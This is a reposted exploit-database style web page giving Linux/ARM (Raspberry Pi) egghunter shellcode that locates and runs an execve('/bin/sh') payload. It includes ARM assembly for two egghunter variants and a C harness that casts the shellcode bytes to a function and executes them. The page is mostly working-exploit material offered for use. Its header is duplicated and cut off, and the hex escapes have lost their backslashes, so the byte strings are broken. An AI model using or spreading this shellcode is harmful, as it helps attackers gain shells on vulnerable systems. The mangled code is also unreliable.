Linux ARM Egghunter bin sh Shellcode

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 317

/*
Linux/ARM (Raspberry Pi) - Egghunter + /bin/sh Shellcode (32 bytes)

------------------------------
// If your shellcode in higer address, use following egghunter.
pi& /*
Linux/ARM (Raspberry Pi) - Egghunter + /bin/sh Shellcode (32 bytes)

------------------------------
// If your shellcode in higer address, use following egghunter.
pi@raspberrypi:~ $ cat egghunter-higher.s
.section .text
.global _start
_start:
.code 32
add r3, pc, #1 // switch to thumb mode
bx r3

.code 16
adr r1, startpoint // set r1 to start point address
ldr r2, egg // set r2 to egg's value

next_addr:
add r1, r1, #1 // increment scan address
ldr r3, [r1] // set r3 to the value stored in r1's address
cmp r2, r3 // compare values
bne next_addr // if failed to find egg, jump to next address

mov r3, pc // switch to arm mode
bx r3

.code 32
mov pc, r1 // jump to found address

egg:
.ascii "x50x90x50x90"
startpoint:

pi@raspberrypi:~ $

------------------------------
// If your shellcode in lower address, use following egghunter.
pi@raspberrypi:~ $ cat egghunter-lower.s
.section .text
.global _start
_start:
.code 32
add r3, pc, #1 // switch to thumb mode
bx r3

.code 16
adr r1, startpoint // set r1 to start point address
ldr r2, egg // set r2 to egg's value

next_addr:
sub r1, r1, #1 // increment scan address
ldr r3, [r1] // set r3 to the value stored in r1's address
cmp r2, r3 // compare values
bne next_addr // if failed to find egg, jump to next address

startpoint:
mov r3, pc // switch to arm mode
bx r3

.code 32
mov pc, r1 // jump to found address

egg:
.ascii "x50x90x50x90"

pi@raspberrypi:~ $

------------------------------
*/

#include <stdio.h>
#include <string.h>

// If your shellcode in higer address, use following egghunter.
unsigned char egghunter[] =
"x01x30x8fxe2x13xffx2fxe1x05xa1x04x4ax01x31x0bx68x9ax42xfbxd1x7bx46x18x47x01xf0xa0xe1x50x90x50x90";

unsigned char egg[] =
"x50x90x50x90" // egg tag
"x01x30x8fxe2x13xffx2fxe1" // execve('/bin/sh')
"x49x40x52x40x01xa0xc2x71"
"x0bx27x01xdfx2fx62x69x6e"
"x2fx73x68x41";

// If your shellcode in lower address, use following egghunter.
//unsigned char egghunter[] =
//"x01x30x8fxe2x13xffx2fxe1x02xa1x04x4ax01x39x0bx68x9ax42xfbxd1x7bx46x18x47x01xf0xa0xe1x50x90x50x90";

void main()
{
printf("Egg hunter shellcode Length: %d ", strlen(egghunter));
printf("Egg shellcode Length: %d ", strlen(egg));

int (*ret)() = (int(*)())egghunter;

ret();
}